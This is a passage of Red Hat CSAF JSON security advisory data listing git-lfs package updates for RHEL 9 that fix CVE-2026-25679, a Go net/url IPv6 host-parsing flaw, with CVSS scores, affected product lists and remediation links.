"AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64"}, "product_reference": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.src", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-21T17:53:20+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.src", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9439"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.src", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.src", "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "AppStream-9.6.0.Z.EUS:git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9439"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for git-lfs is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9436", "url": "https://access.redhat.com/errata/RHSA-2026:9436"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9436.json"}], "title": "Red Hat Security Advisory: git-lfs security update", "tracking": {"current_release_date": "2026-06-08T15:52:51+00:00", "generator": {"date": "2026-06-08T15:52:51+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9436", "initial_release_date": "2026-04-21T17:09:01+00:00", "revision_history": [{"date": "2026-04-21T17:09:01+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-21T17:09:01+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:51+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product": {"name": "Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_e4s:9.0::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:2.13.3-5.el9_0.7.src", "product": {"name": "git-lfs-0:2.13.3-5.el9_0.7.src", "product_id": "git-lfs-0:2.13.3-5.el9_0.7.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@2.13.3-5.el9_0.7?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:2.13.3-5.el9_0.7.aarch64", "product": {"name": "git-lfs-0:2.13.3-5.el9_0.7.aarch64", "product_id": "git-lfs-0:2.13.3-5.el9_0.7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@2.13.3-5.el9_0.7?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "product": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "product_id": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@2.13.3-5.el9_0.7?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "product": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "product_id": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@2.13.3-5.el9_0.7?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "product": {"name": "git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "product_id": "git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@2.13.3-5.el9_0.7?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", "product": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", "product_id": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@2.13.3-5.el9_0.7?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "product": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "product_id": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@2.13.3-5.el9_0.7?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:2.13.3-5.el9_0.7.x86_64", "product": {"name": "git-lfs-0:2.13.3-5.el9_0.7.x86_64", "product_id": "git-lfs-0:2.13.3-5.el9_0.7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@2.13.3-5.el9_0.7?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64", "product": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64", "product_id": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@2.13.3-5.el9_0.7?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "product": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "product_id": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@2.13.3-5.el9_0.7?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:2.13.3-5.el9_0.7.s390x", "product": {"name": "git-lfs-0:2.13.3-5.el9_0.7.s390x", "product_id": "git-lfs-0:2.13.3-5.el9_0.7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@2.13.3-5.el9_0.7?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "product": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "product_id": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@2.13.3-5.el9_0.7?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "product": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "product_id": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@2.13.3-5.el9_0.7?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:2.13.3-5.el9_0.7.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.aarch64"}, "product_reference": "git-lfs-0:2.13.3-5.el9_0.7.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:2.13.3-5.el9_0.7.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.ppc64le"}, "product_reference": "git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:2.13.3-5.el9_0.7.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.s390x"}, "product_reference": "git-lfs-0:2.13.3-5.el9_0.7.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:2.13.3-5.el9_0.7.src as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.src"}, "product_reference": "git-lfs-0:2.13.3-5.el9_0.7.src", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:2.13.3-5.el9_0.7.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.x86_64"}, "product_reference": "git-lfs-0:2.13.3-5.el9_0.7.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64"}, "product_reference": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le"}, "product_reference": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x"}, "product_reference": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64"}, "product_reference": "git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64"}, "product_reference": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le"}, "product_reference": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x"}, "product_reference": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.9.0)", "product_id": "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64"}, "product_reference": "git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64", "relates_to_product_reference": "AppStream-9.0.0.Z.E4S"}]}, "vulnerabilities": [{"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.src", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-21T17:09:01+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": ["AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.src", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.x86_64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9436"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.src", "AppStream-9.0.0.Z.E4S:git-lfs-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.ppc64le", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.s390x", "AppStream-9.0.0.Z.E4S:git-lfs-debuginfo-0:2.13.3-5.el9_0.7.x86_64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.aarch64", "AppStream-9.0.0.Z.E4S:git-lfs-debugsource-0:2.13.3-5.el9_0.7.ppc64le", 